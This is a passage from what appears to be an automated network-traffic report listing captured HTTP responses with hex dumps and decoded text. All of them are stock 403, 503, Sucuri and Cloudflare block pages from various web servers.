74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 31 May 2023 12:52:03 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:04 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:03 GMTServer: ApacheContent-Length: 318Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:52:04 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 318Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 31 May 2023 12:52:04 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:52:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:05 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd3kzTVEeNf/iB9j3c1cpqs,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=X-Wix-Request-Id: 1685537525.075266399352117230X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:05 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6pJBTpK3A8bvN%2B86ikUnfjOxXAkvrfBYM0GzYOTTUBAwRVD37Rpy4M2Y%2BSYlagB1qCRJKaCt2%2FNdN5%2Fa5GfVAs4mlh5G%2FPQv%2FMROm28e3s8OrMnVaCntLkEWu1i%2FUUCS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a1c2ade92ab-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:05 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6oRFbVrtEHB5qZxvqpQqZlzi9DdyiC0JiDQ5b5tY%2BNImSfKf7ZJBj2auQZlN5NLEzqcHs4FBPsZOsnn8slJi%2FOMvKEubpIqloZNYlAbD%2Blnje8Dh33vIqJA8wFjefj4e"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a1c6b1392ab-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 31 May 2023 12:52:20 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QkERt7zPlbqTiK8OXzsiJxpcPMMrBxl7Ct95CmSGPoLTW9HbDuMM5C54LiNUtipf65PvS3FiOVpklzmGTDXijlBObTs4R5GK6RqwER%2FZaVwly2AndRQnGLMSR%2Bpuqw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: 